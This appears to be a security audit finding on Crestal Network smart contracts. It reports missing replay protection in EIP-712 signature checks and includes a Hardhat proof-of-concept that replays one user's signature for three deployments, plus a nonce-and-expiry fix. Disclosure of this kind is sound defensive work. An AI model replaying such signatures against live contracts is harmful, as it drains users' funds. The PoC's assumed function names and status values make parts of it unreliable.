Feisty Pickle Liger

High

# Attackers Can Execute Multiple Unauthorized Operations by Replaying Valid Signatures

### Summary

The contract's signature verification mechanism lacks replay protection, allowing attackers to reuse valid signatures multiple times. This vulnerability affects all functions with the `withSig` suffix that rely on EIP-712 signatures for gasless transactions.

### Root Cause

The root cause is the absence of a nonce or other replay protection mechanism in the signature verification process. The current implementation in `EIP712.sol` only verifies that the signature is valid (created by the correct private key) but does not track whether a signature has been used before:

[crestal-omni-contracts/src/EIP712.sol:getSignerAddress#L47-L51](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/EIP712.sol#L47C1-L51C6)
```solidity
function getSignerAddress(
    bytes32 hash,
    bytes memory signature
) public pure returns (address) {
    address signerAddr = ECDSA.recover(hash, signature);
    require(signerAddr != address(0), "Invalid signature");
    return signerAddr;
}
```

When verifying signatures in functions like `createAgentWithSigWithNFT` or `updateWorkerDeploymentConfigWithSig`, the contract does not:
1. Include a nonce in the signed message
2. Track used signatures
3. Implement signature expiration

[crestal-omni-contracts/src/BlueprintCore.sol:crestal-omni-contracts/src/BlueprintCore.sol:createAgentWithSigWithNFT#L566-L582](https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/BlueprintCore.sol#L566C1-L582C6)
```solidity
    function createAgentWithSigWithNFT(
        bytes32 projectId,
        string memory base64Proposal,
        address privateWorkerAddress,
        string memory serverURL,
        bytes memory signature,
        uint256 tokenId
    ) public returns (bytes32 requestID) {
        // get EIP712 hash digest
        bytes32 digest = getRequestDeploymentDigest(projectId, base64Proposal, serverURL);

        // get signer address
        address signerAddr = getSignerAddress(digest, signature);

        requestID =
            createAgent(signerAddr, projectId, base64Proposal, privateWorkerAddress, serverURL, tokenId, address(0));
    }
```

### Internal Pre-conditions

The signature verification process does not include nonce validation and implement signature expiration.

### External Pre-conditions

The signature must not have inherent expiration or usage limitations

### Attack Path

An attacker could exploit this vulnerability through the following steps:

1. Monitor the blockchain for transactions that use signature-based functions
2. Extract the signature and associated parameters from a valid transaction
3. Resubmit the same signature and parameters in a new transaction
4. The contract will verify the signature as valid and execute the operation again
5. Repeat steps 3-4 multiple times to maximize impact

### Impact

1. **Financial Loss**: Repeated execution of payment operations
2. **Denial of Service**: System resources consumed by replayed operations

### PoC

1. **Attack Demonstration**:
   - User creates a valid signature for a deployment request
   - First legitimate use of the signature succeeds
   - Attacker replays the same signature for a second deployment
   - Attacker continues replaying for a third deployment
   - All deployments succeed with the same signature

2. **Verification**:
   - Each deployment creates a unique request ID
   - All deployments have valid status
   - The total deployment count increases with each replay


<details><summary>POC</summary>

```javascript
const { expect } = require("chai");
const { ethers } = require("hardhat");

describe("Signature Replay Vulnerability", function () {
  let blueprintCore;
  let owner;
  let user;
  let attacker;
  let domain;
  let types;
  let projectId;

  beforeEach(async function () {
    // Get signers
    [owner, user, attacker] = await ethers.getSigners();
    
    console.log("Owner address:", owner.address);
    console.log("User address:", user.address);
    console.log("Attacker address:", attacker.address);
    
    // Deploy the BlueprintCore contract
    const BlueprintCore = await ethers.getContractFactory("BlueprintCore");
    blueprintCore = await BlueprintCore.deploy();
    await blueprintCore.deployed();
    console.log("BlueprintCore deployed at:", blueprintCore.address);
    
    // Create a project for testing
    projectId = ethers.utils.id("test-project");
    await blueprintCore.connect(owner).createProject(projectId, "Test Project", "Test Description");
    console.log("Test project created with ID:", projectId);
    
    // Set up EIP-712 domain and types for signing
    domain = {
      name: "BlueprintCore",
      version: "1",
      chainId: (await ethers.provider.getNetwork()).chainId,
      verifyingContract: blueprintCore.address
    };
    
    types = {
      DeploymentRequest: [
        { name: "projectId", type: "bytes32" },
        { name: "base64RecParam", type: "string" },
        { name: "serverURL", type: "string" }
      ]
    };
  });

  it("Demonstrates signature replay attack for deployment requests", async function () {
    // GIVEN: User creates a valid signature for deployment
    console.log("\n--- STEP 1: User creates a valid signature ---");
    
    const base64RecParam = "eyJwYXJhbWV0ZXJzIjogeyJtb2RlbCI6ICJncHQtNCJ9fQ=="; // Base64 encoded parameters
    const serverURL = "app.crestal.network";
    
    const value = {
      projectId: projectId,
      base64RecParam: base64RecParam,
      serverURL: serverURL
    };
    
    // User signs the deployment request
    const signature = await user._signTypedData(domain, types, value);
    console.log("Signature created by user:", signature.substring(0, 20) + "...");
    
    // WHEN: First legitimate use of the signature
    console.log("\n--- STEP 2: First legitimate use of signature ---");
    
    // Set up payment token for deployment
    const paymentToken = "0x0000000000000000000000000000000000000000"; // Using ETH for simplicity
    await blueprintCore.connect(owner).enablePaymentAddress(paymentToken, true);
    
    // Execute first deployment request
    const tx1 = await blueprintCore.connect(attacker).requestDeploymentWithSig(
      paymentToken,
      projectId,
      base64RecParam,
      serverURL,
      signature,
      { value: ethers.utils.parseEther("0.01") } // Assuming some ETH is required
    );
    
    const receipt1 = await tx1.wait();
    const requestId1 = receipt1.events.find(e => e.event === "RequestDeployment").args.requestID;
    console.log("First deployment requested with ID:", requestId1);
    
    // THEN: Verify first deployment was successful
    const deploymentStatus1 = await blueprintCore.getRequestDeploymentStatus(requestId1);
    console.log("First deployment status:", deploymentStatus1.status);
    expect(deploymentStatus1.status).to.equal(1); // Assuming 1 is the "Init" status
    
    // AND WHEN: Attacker replays the same signature
    console.log("\n--- STEP 3: Attacker replays the same signature ---");
    
    // Execute second deployment with the same signature
    const tx2 = await blueprintCore.connect(attacker).requestDeploymentWithSig(
      paymentToken,
      projectId,
      base64RecParam,
      serverURL,
      signature,
      { value: ethers.utils.parseEther("0.01") }
    );
    
    const receipt2 = await tx2.wait();
    const requestId2 = receipt2.events.find(e => e.event === "RequestDeployment").args.requestID;
    console.log("Second deployment requested with ID:", requestId2);
    
    // THEN: Verify second deployment was also successful
    const deploymentStatus2 = await blueprintCore.getRequestDeploymentStatus(requestId2);
    console.log("Second deployment status:", deploymentStatus2.status);
    expect(deploymentStatus2.status).to.equal(1);
    expect(requestId1).to.not.equal(requestId2); // Different request IDs
    
    // AND WHEN: Attacker continues replaying the signature
    console.log("\n--- STEP 4: Attacker continues replaying the signature ---");
    
    // Execute third deployment with the same signature
    const tx3 = await blueprintCore.connect(attacker).requestDeploymentWithSig(
      paymentToken,
      projectId,
      base64RecParam,
      serverURL,
      signature,
      { value: ethers.utils.parseEther("0.01") }
    );
    
    const receipt3 = await tx3.wait();
    const requestId3 = receipt3.events.find(e => e.event === "RequestDeployment").args.requestID;
    console.log("Third deployment requested with ID:", requestId3);
    
    // THEN: Verify third deployment was also successful
    const deploymentStatus3 = await blueprintCore.getRequestDeploymentStatus(requestId3);
    console.log("Third deployment status:", deploymentStatus3.status);
    expect(deploymentStatus3.status).to.equal(1);
    
    // Count total deployments for the project
    const deploymentCount = await blueprintCore.getProjectDeploymentCount(projectId);
    console.log("\nTotal deployments for project:", deploymentCount.toString());
    expect(deploymentCount).to.be.at.least(3);
    
    console.log("\n--- VULNERABILITY CONFIRMED ---");
    console.log("Same signature was successfully used for multiple deployments");
    console.log("Impact: Unauthorized creation of multiple deployments using a single signature");
    console.log("This could lead to financial losses, resource exhaustion, or service disruption");
  });
});
```
</details>

### Mitigation

This comprehensive approach ensures that each signature can only be used once, has a limited validity period, and is tied to both a specific user and project. To address this vulnerability, implement one of the following protection mechanisms in the `EIP712.sol` contract:

```solidity
// Add both nonce mapping and used signatures tracking
+  mapping(address => uint256) public nonces;

// Updated digest function
function getRequestDeploymentDigest(
    bytes32 projectId,
    string memory base64RecParam,
    string memory serverURL,
+   uint256 nonce,
+   uint256 expiry
) public view returns (bytes32) {
    bytes32 structHash = keccak256(
        abi.encode(
            DEPLOYMENT_REQUEST_TYPEHASH,
            projectId,
            keccak256(bytes(base64RecParam)),
            keccak256(bytes(serverURL)),
+           nonce,
+           expiry
        )
    );

    return _hashTypedDataV4(structHash);
}

```